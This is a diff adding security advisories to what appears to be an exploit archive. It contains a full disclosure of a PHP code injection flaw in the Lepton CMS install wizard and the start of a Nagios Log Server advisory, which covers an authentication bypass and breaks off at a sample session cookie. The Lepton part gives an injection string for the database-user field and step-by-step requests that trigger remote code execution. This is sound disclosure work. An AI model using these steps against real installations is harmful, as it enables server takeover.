contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +HYP3RLINX diff --git a/platforms/php/webapps/40248.txt b/platforms/php/webapps/40248.txt new file mode 100755 index 000000000..879541cec --- /dev/null +++ b/platforms/php/webapps/40248.txt @@ -0,0 +1,141 @@ +[+] Credits: John Page (HYP3RLINX) + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt + +[+] ISR: ApparitionSec + + + +Vendor: +================== +www.lepton-cms.org + + + +Product: +================================= +Lepton CMS 2.2.0 / 2.2.1 (update) + +LEPTON is an easy-to-use but full customizable Content Management System +(CMS). + + + + +Vulnerability Type: +=================== +PHP Code Injection + + + +CVE Reference: +============== +N/A + + + +Vulnerability Details: +===================== + +No input validation check is done on the "Database User" input field when +entering Lepton CMS setup information using the Install Wizard. +Therefore, a malicious user can input whatever they want in "config.php", +this can allow for PHP Remote Command Execution on the Host system. + +e.g. + +In the database username field, single quote to close "DB_USERNAME" value +then open our own PHP tags. + +');?> + +Now in "config.php" the Database username becomes ===> +define('DB_USERNAME', '');?>'); + +A security check attempt is made by Lepton to disallow making multiple HTTP +requests for "config.php". On line 3 of "config.php" file we find. + +/////////////////////////////////////////////////////////////////////////////////////////////////////// + +if(defined('LEPTON_PATH')) { die('By security reasons it is not permitted +to load \'config.php\' twice!! +Forbidden call from \''.$_SERVER['SCRIPT_NAME'].'\'!'); } + +/////////////////////////////////////////////////////////////////////////////////////////////////////////// + +However, the security check is placed on line 3 way before "LEPTON_PATH" +has been defined allowing complete bypass of that access control check. +Now we can inject our own PHP code into the config allowing Remote Command +Execution or Local/Remote File Includes etc... + +Next, make HTTP GET request to "http://victim-server/upload/install/save.php" +again and code execution will be achieved or request "config.php" +directly as the security check made on line 3 of "config.php" to prevent +multiple HTTP requests to "config.php" does NOT work anyhow. + +In situations where an installation script is provided as part of a some +default image often available as a convenience by hosting providers, this +can +be used to gain code execution on the target system and bypass whatever +security access controls/restrictions etc. + +References: +http://www.lepton-cms.org/posts/important-lepton-2.2.2-93.php + + +Exploit code(s): +=============== + +1) At step 4 of Leptons Install Wizard, enter ');?> for Database User name, then fill in rest of fields + +2) Click go to step 5 and fill in required fields, then click "Install +LEPTON" + +3) Make HTTP GET request to: + + http://localhost/LEPTON_stable_2.2.0/upload/install/save.php + + OR + + http://localhost/LEPTON_stable_2.2.0/upload/config.php + + +BOOM pop calc.exe... + + + +Disclosure Timeline: +=========================================================== +Attempted Vendor Notification: June 11, 2016 (No replies) +Vendor Notification on July 12, 2016 ( thanks Henri Salo ) +Vendor Acknowledgement: July 13, 2016 +Vendor fixes: July 14, 2016 +Vendor release version 2.2.2 : August 12, 2016 +August 15, 2016 : Public Disclosure + + + + +Severity Level: +================ +High + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +HYP3RLINX diff --git a/platforms/php/webapps/40250.txt b/platforms/php/webapps/40250.txt new file mode 100755 index 000000000..b91d7e51a --- /dev/null +++ b/platforms/php/webapps/40250.txt @@ -0,0 +1,170 @@ +( , ) (, + . '.' ) ('. ', + ). , ('. ( ) ( + (_,) .'), ) _ _, + / _____/ / _ \ ____ ____ _____ + \____ \==/ /_\ \ _/ ___\/ _ \ / \ + / \/ | \\ \__( <_> ) Y Y \ +/______ /\___|__ / \___ >____/|__|_| / + \/ \/.-. \/ \/:wq + (x.0) + '=.|w|.=' + _=''"''=. + + presents.. + +Nagios Log Server Multiple Vulnerabilities +Affected versions: Nagios Log Server <= 1.4.1 + +PDF: +http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf + ++-----------+ +|Description| ++-----------+ +The Nagios Log Server application is affected by multiple security +vulnerabilities, including authentication bypass, stored cross-site +scripting, inconsistent authorization controls and privilege escalation. + +These vulnerabilities can be chained together to obtain unauthenticated +remote code execution in the context of the root user. + + ++------------+ +|Exploitation| ++------------+ +==Authentication Bypass== +Authentication for the Nagios Log Server web management interface can be +bypassed due to an insecure implementation of the function validating +session cookies within the ‘Session.php’ file. As shown below, the +application uses a base64 encoded serialized PHP string along with a +SHA1 HMAC checksum as the cookie to authenticate and manage user +sessions. A sample cookie format is shown below: + +a:11:{s:10:"session_id";s:32:"4a6dad39cec8d6a5ef5a1a1d231bf9fa";s:10:"ip_address";s:15:"123.123.123.123"; +s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) +Gecko/20100101 Firefox/46.0"; +s:13:"last_activity";i:1463700310;s:9:"user_data";s:0:"";s:7:"user_id";s:1:"1";s:8:"username";s:4:"user"; +s:5:"email";s:16:"test@example.com";s:12:"ls_logged_in";i:1;s:10:"apisession";i:1;s:8:"language";s:7:"default";}